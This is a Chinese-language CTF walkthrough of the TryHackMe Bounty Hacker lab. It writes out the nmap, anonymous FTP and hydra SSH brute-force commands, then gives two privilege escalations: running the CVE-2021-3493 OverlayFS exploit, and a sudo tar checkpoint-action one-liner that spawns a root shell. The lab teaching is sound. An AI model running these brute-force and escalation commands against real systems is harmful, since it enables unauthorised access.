发布于3月6日3月6日 Members 前言 房间地址:https://tryhackme.com/room/cowboyhacker 你在酒吧里不断地吹嘘你的精英黑客技能,一些赏金猎人决定接受你的索赔!证明您的地位不仅仅是在酒吧喝几杯。我感觉到你的未来是青椒和牛肉! 实战 靶机地址:10.10.178.87 kali启动 扫描 nmap -A -sC 10.10.178.87 扫描结果 如下 查看提示: 访问网站看看他们给了什么 查一下翻译快一点 ,虽然域大致能看懂 看出来这些用户名都不像是要攻击的对象 所以我们需要以匿名登录FTP ftp 10.10.178.87 #用户名 anonymous 有两个文件 我们拿下来看看 如果有passive拦截就先退出 输入passive关闭安全拦截 好的都拿下了 上面的那个是lock.txt 看出来好像是个密码 我们打开task.txt看一下 可以看到我们的ssh用户应该是lin 所以我们需要用九头蛇去爆破他 hydra -t 50 -l lin -P locks.txt -vV 10.10.178.87 ssh 出来了 ssh [email protected] 让我们先拿一个user.txt flag再说 下面还是提权 先看一下内核信息 cat /proc/version #或者 uname -a 系统是乌班图 版本是16.04.12 sudo-l 看一下 提权 以下两种提权方法 第一种CVE-2021-3493提权 根据我们之前看到的版本是16.04.12 可以知道CVE漏洞利用:CVE-2021-3493 https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/ 漏洞给了我们信息 也给了我们演示 看一下CVE漏洞提权演示 GitHub – briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc 可以去github下载文件 我把这个名字改了一下传到kali目录里 让后在本机传进去SSH 这里我犯了一个致命的问题(之前一直依赖工具传木马在工具上传文件 ) ,所以这次在ssh里传文件的时候我命令被禁止了, 我百思不得其解,甚至去找群主我为什么错了 不得不说我这此犯的错误有一点蠢哈哈 感谢群主指导, 啊啊啊,有那么一瞬间我觉得我是小可爱 我们scp传的时候是在本机kali上传而不是在ssh上传 scp /tmp/CVE2021.c [email protected]:/tmp 好的传上去了 让我们去编译运行他吧! gcc CVE2021.c -o CVE #编译CVE2021.c 并-o 保存名字为CVE的文件 .CVE #运行我们的内核文件 好的 拿flag OK了 第二种官方题解提权 之前我们sudo -l查询一下我们的权限 可以看见我们可以以root身份去运行/bin/tar 那么这一定是个RCE执行漏洞 我们去这个地址https://gtfobins.github.io/# 搜索一下二进制内核漏洞 让我们搜索一下tar 进去tar 复制命令 tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh 一个命令我们就是root了 再次感谢群主指导 借鉴了群主的WPhttps://blog.csdn.net/qq_54704239/article/details/128405540
